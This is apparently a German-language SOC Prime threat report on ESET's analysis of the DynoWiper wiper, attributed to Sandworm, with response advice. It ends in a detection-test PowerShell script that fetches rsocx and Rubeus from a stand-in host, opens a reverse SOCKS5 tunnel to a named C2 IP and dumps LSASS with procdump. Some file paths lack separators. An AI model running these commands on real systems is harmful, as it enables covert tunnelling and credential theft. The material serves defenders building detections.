SOC Prime Bias: Kritisch

04 Feb 2026 15:19 UTC

ESET Forschung DynoWiper-Update: Technische Analyse und Zuordnung

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
ESET Forschung DynoWiper-Update: Technische Analyse und Zuordnung
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

DynoWiper ist ein destruktiver Wiper, der gegen eine Organisation im Energiesektor in Polen eingesetzt wurde und mehrere Endpunkte in den Operationen beeinflusste. Die ausführbaren Dateien wurden an einem gemeinsamen Netzwerkstandort hinterlegt und direkt von dort gestartet. ESET führt die Aktivität mit mittlerer Sicherheit auf Sandworm zurück. Nach der Ausführung beschädigt die Malware gezielt Dateien mit zufälligen Bytes und löst einen erzwungenen Neustart aus, um die Auswirkungen abzuschließen.

Untersuchung

ESET hat drei Proben wiederhergestellt — schtask.exe, schtask2.exe und _update.exe — die unter C:inetpubpub abgelegt wurden. Eingebettete PDB-Pfade deuten darauf hin, dass die Binärdateien in einer Vagrant-Umgebung kompiliert wurden. Reverse Engineering zeigte eine dreistufige Wiping-Routine, bei der zwei Varianten eine fünfsekündige Pause zwischen den Phasen einfügen. Nach dem Kompromittierungsprozess beinhalteten die Artefakte auch das Kerberos-Tool Rubeus und einen rsocx SOCKS5-Proxy im Netzwerk des Opfers.

Minderung

ESET PROTECT auf den betroffenen Systemen blockierte alle drei Varianten und begrenzte so den Schaden. Reduzieren Sie die Exposition, indem Sie die Erstellung unautorisierter geplante Tasks verhindern und unfreiwillige Schreibvorgänge in freigegebene Verzeichnisse überwachen. Fügen Sie Anwendungs-Whitelist hinzu und verhindern Sie, soweit möglich, die Ausführung von Netzlaufwerken.

Antwort

Identifizieren und isolieren Sie Hosts, die schtask.exe, schtask2.exe oder *_update.exe von einem Share ausführen. Bewahren Sie flüchtige Beweise, überprüfen Sie geplante Tasks und PowerShell-Bereitstellungsspuren und entfernen Sie Tools wie Rubeus und rsocx. Führen Sie eine vollständige forensische Untersuchung durch und stellen Sie Daten aus überprüften sauberen Backups wieder her.

Angriffsablauf

Simulation Ausführung

Voraussetzung: Die Telemetrie- & Basislinien-Pre-Flight-Überprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die so gestaltet ist, dass sie die Erkennungsregel auslöst. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:

    1. Richten Sie einen Reverse SOCKS5-Proxy ein unter Verwendung von rsocx.exe. Der Angreifer lädt die Binärdatei von einem externen Server herunter, platziert sie in %TEMP%, und führt sie mit dem Argument -r 31.172.71.5:8008 aus, um einen Rückkanal zurück zum C2-Host zu erstellen.
    2. Führen Sie Kerberos-Ticket-Missbrauch durch mit rubeus.exe. Das Tool wird ausgeführt, um ein Kerberos-Ticket-Granting Ticket (TGT) für das Domain-Admin-Konto anzufordern und anschließend ein Service-Ticket (s4u2self).
    3. Dumpt LSASS-Speicher unter Verwendung von procdump.exe (eine häufige Alternative zum Task-Manager), um Anmeldeinformationen zu erfassen. Sysmon zeichnet ein Prozesszugriffsereignis auf, bei dem der procdump.exe Prozess des Angreifers lsass.exe mit der Zugriffsmaske 0x1010 öffnet (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
  • Regressionstestskript:

    # -------------------------------------------------------------
    # Simulationsscript – löst die Sigma-Regel für rsocx, rubeus,
    # und LSASS-Dump. Führen Sie es mit Administratorrechten aus.
    # -------------------------------------------------------------
    
    # 1. rsocx.exe bereitstellen (Reverse SOCKS5 Proxy)
    $rsocxPath = "$env:TEMPrsocx.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath
    Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden
    
    # 2. rubeus.exe bereitstellen (Kerberos-Missbrauch)
    $rubeusPath = "$env:TEMPrubeus.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath
    Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden
    
    # 3. LSASS mit procdump abdumpen (erfordert Sysinternals)
    $procdumpPath = "$env:TEMPprocdump.exe"
    Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip"
    Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force
    $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1
    if ($procdumpExe) {
        Copy-Item $procdumpExe.FullName $procdumpPath -Force
        Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait
    }
    
    Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme."
  • Aufräumbefehle:

    # Beenden Sie alle verbleibenden bösartigen Prozesse
    Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Entfernen Sie Binärdateien und Dump-Dateien
    Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue
    
    # Optional: temporäre Download-Verzeichnisse löschen
    Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Bereinigung abgeschlossen."